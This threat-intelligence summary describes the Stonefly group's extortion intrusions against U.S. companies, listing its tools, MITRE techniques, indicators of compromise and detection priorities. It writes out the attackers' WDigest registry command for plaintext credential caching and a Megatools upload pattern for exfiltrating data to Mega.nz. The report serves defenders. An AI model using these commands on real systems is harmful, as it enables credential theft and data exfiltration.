Threat Research

Stonefly: Ongoing Extortion Attacks Targeting U.S. Entities

Securonix

Symantec reports ongoing financially motivated intrusions by the North Korea–linked Stonefly group against U.S. private organizations, using custom and publicly available tools to steal credentials and exfiltrate data. Campaigns have deployed Backdoor.Preft alongside Nukebot, custom Mimikatz variants, keyloggers, Chisel tunneling, and fake/unique certificates. #Stonefly #Backdoor.Preft

Keypoints

  • Stonefly (aka Andariel/APT45) is conducting financially motivated intrusions against U.S. private companies.
  • Attacks consistently deploy the custom multi-stage backdoor Backdoor.Preft (aka Dtrack/Valefor) with plugin support and multiple persistence mechanisms.
  • Credential theft is performed via registry modification to enable plaintext credentials, followed by a custom Mimikatz variant that writes to C:WindowsTempKB0722.log.
  • Attackers used additional tools including Nukebot, two distinct keyloggers (SHA256 examples provided), Sliver, Chisel, Plink/PuTTY, Megatools, Snap2HTML, and FRP.
  • Chisel and other tunneling/proxy tools were used for C2 and remote access; Megatools was used to exfiltrate data to Mega.nz.
  • Operators abused fake and unique code-signing certificates (thumbprints listed) to sign or validate tooling used in the campaign.

MITRE Techniques

  • [T1003] Credential Dumping – Used Mimikatz to extract credentials (‘Utilized Mimikatz to dump credentials.’)
  • [T1219] Remote Access Tools – Employed Plink and PuTTY for remote access and interactive connections (‘Used Plink and PuTTY for remote access.’)
  • [T1041] Exfiltration Over C2 Channel – Data exfiltration performed using Megatools to upload archives to Mega.nz (‘Megatools was used to perform data exfiltration:’)
  • [T1071] Application Layer Protocol (Command and Control) – Chisel used to create HTTP/SSH tunnels for C2 and tunneling (‘Utilized Chisel for tunneling and command-and-control operations.’)

Indicators of Compromise

  • [File Hash] Backdoor and tool hashes – f64dab23c50e3d131abcc1bdbb35ce9d68a34920dd77677730568c24a84411c5 (Backdoor.Preft), a65cefb3c2ccdb50704b1af1008a1f8c7266aa85bd24aaf21f6eb1ddd5b79c81 (Backdoor.Preft), and 20+ other hashes listed in the report.
  • [File Hash] Keylogger samples – 485465f38582377f9496a6c77262670a313d8c6e01fd29a5dbd919b9a40e68d5, d867aaa627389c377a29f01493e9dff517f30db8441bf2ccc8f80c48eaa0bf91 (keyloggers).
  • [IP Address] Command-and-control and access hosts – 216.120.201[.]112:443, 51.81.168[.]157:443, and additional Plink-related IPs (e.g., 217.195.153[.]209).
  • [Certificate] Observed code-signing/thumbprints – thumbprint “313cffaac3d1576ca3c1cee8f9a68a15a24ff418” (Baramundi Inc.), thumbprint “10b8b939400a59d2cb79fff735796d484394f8dd” (VEXIS SOFTWARE LTD.), used as fake/unique certificates in the campaign.
  • [File Names/Paths] Local artifacts and logs – C:WindowsTempKB0722.log (Mimikatz output), 0.log (keylogger), and temporary ZIP archives such as sig.rar used with Megatools uploads.

Backdoor.Preft is a multi-stage implant used throughout the campaign: it supports downloading/uploading files, executing commands, and loading plugins of multiple types (EXE, VBS, BAT, shellcode). The backdoor implements several persistence options — Startup .LNK, Windows Service, Registry entries, and Task Scheduler — allowing long-term presence and modular extension via plugins. Operators also deployed Nukebot (a backdoor obtained from leaked source), two distinct clipboard-and-keystroke-stealing keyloggers that log to temporary files (0.log or randomly-named .DAT files), and used Snap2HTML for filesystem snapshots.

Credential access followed a consistent technical pattern: a malicious batch file modified the registry to enable plaintext credential caching (HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1), then a customized Mimikatz binary was run to dump credentials and write results to C:WindowsTempKB0722.log. Keyloggers captured clipboard contents and keystrokes, archiving logs into password-protected ZIPs in temp directories. Lateral access and remote control relied on PuTTY/Plink for SSH connections and Sliver for post-exploitation, with Chisel and FRP used to create tunneled C2 channels over HTTP/SSH.

For data staging and exfiltration the operators used Megatools with a command-line upload to Mega.nz (example pattern: mt.exe put -u [USER] -p [PASS] /Root). C2 infrastructure included TCP/443 endpoints (e.g., 216.120.201[.]112:443, 51.81.168[.]157:443) and multiple malicious binaries with SHA256 indicators. Observed operational tradecraft also included use of fake or unique certificates to sign or validate tooling, and use of known legitimate tools (PuTTY, Plink, Snap2HTML) to blend activity. Detection should prioritize identifying Preft plugin installations, WDigest registry changes, Mimikatz outputs in temp folders, keylogger artifacts (0.log, random .DAT), unusual Megatools activity, and connections to the listed IPs and C2 endpoints.

Read more: https://symantec-enterprise-blogs.security.com/threat-intelligence/stonefly-north-korea-extortion